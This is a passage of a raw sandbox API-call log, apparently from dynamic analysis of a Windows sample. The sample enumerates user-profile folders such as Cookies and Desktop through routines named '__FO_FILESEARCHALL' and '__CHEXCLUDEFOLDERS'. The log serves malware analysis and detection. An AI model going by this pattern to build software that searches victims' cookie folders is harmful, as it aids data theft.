hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d80 [0157.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d80 [0157.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6c0 [0157.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.108] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x108007c, ftCreationTime.dwLowDateTime=0x3c0c, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x11, ftLastWriteTime.dwHighDateTime=0x102007d, nFileSizeHigh=0x3c0c, nFileSizeLow=0x8e2ba0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="si\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d70 [0157.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0157.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d80 [0157.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba6d8 [0157.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba708 [0157.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae98 | out: hHeap=0x8a0000) returned 1 [0157.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0157.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.109] FindClose (in: hFindFile=0x90ae58 | out: hFindFile=0x90ae58) returned 1 [0157.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6f0 | out: hHeap=0x8a0000) returned 1 [0157.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d50 | out: hHeap=0x8a0000) returned 1 [0157.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0157.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.111] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d18 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba678 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cd0 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9bc8 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ca0 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cf0 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d00 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6a8 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5b8 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d20 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c40 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d60 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a48 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d48 | out: hHeap=0x8a0000) returned 1 [0157.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d78 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d00 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c88 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ce0 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee98 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e08 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c80 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c90 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c70 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c60 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d10 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d30 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c20 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b08 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9da8 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e68 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9df0 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9dd8 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9dc0 | out: hHeap=0x8a0000) returned 1 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0157.112] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0157.112] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c20 [0157.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c20 | out: hHeap=0x8a0000) returned 1 [0157.113] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c20 [0157.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0157.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9dc0 [0157.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d10 [0157.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d10 | out: hHeap=0x8a0000) returned 1 [0157.113] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8a7560, cFileName="Cookies", cAlternateFileName="")) returned 1 [0157.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9dd8 [0157.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9df0 [0157.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d10 [0157.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9dc0 | out: hHeap=0x8a0000) returned 1 [0157.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0157.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c20 | out: hHeap=0x8a0000) returned 1 [0157.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9df0 | out: hHeap=0x8a0000) returned 1 [0157.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d10 | out: hHeap=0x8a0000) returned 1 [0157.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9dd8 | out: hHeap=0x8a0000) returned 1 [0157.113] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d10 [0157.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1c20 [0157.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c20 | out: hHeap=0x8a0000) returned 1 [0157.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d10 | out: hHeap=0x8a0000) returned 1 [0157.113] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d10 [0157.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1c20 [0157.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.114] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d10 [0157.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c20 [0157.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c60 [0157.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c70 [0157.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0157.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1c90 [0157.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.114] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.114] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0157.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9da8 [0157.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d00 [0157.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b08 [0157.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d60 [0157.114] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d60 [0157.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d30 [0157.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c40 [0157.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0157.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d20 [0157.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cookies", cchCount1=7, lpString2="AppData", cchCount2=7) returned 3 [0157.115] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.115] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d60 [0157.115] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d10 [0157.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.115] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.115] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0157.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6a8 [0157.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ca0 [0157.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d00 [0157.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9bc8 [0157.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0157.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba678 [0157.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cd0 [0157.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d18 [0157.115] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x7738e0d2, ftCreationTime.dwLowDateTime=0x9ba6f0, ftCreationTime.dwHighDateTime=0x50, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x9ba00e, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x857028c, nFileSizeHigh=0x3d32, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0xffffffff [0157.116] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.116] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.116] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.116] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.116] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcaceccc0, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xcaceccc0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x87ed94, dwReserved1=0x8a7560, cFileName="Desktop", cAlternateFileName="")) returned 1 [0157.116] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.116] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.116] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.116] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.116] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.116] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop", cchCount1=7, lpString2="AppData", cchCount2=7) returned 3 [0157.116] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.116] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.116] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.116] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.117] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.117] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcaceccc0, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xcaceccc0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90ae58 [0157.117] FindNextFileW 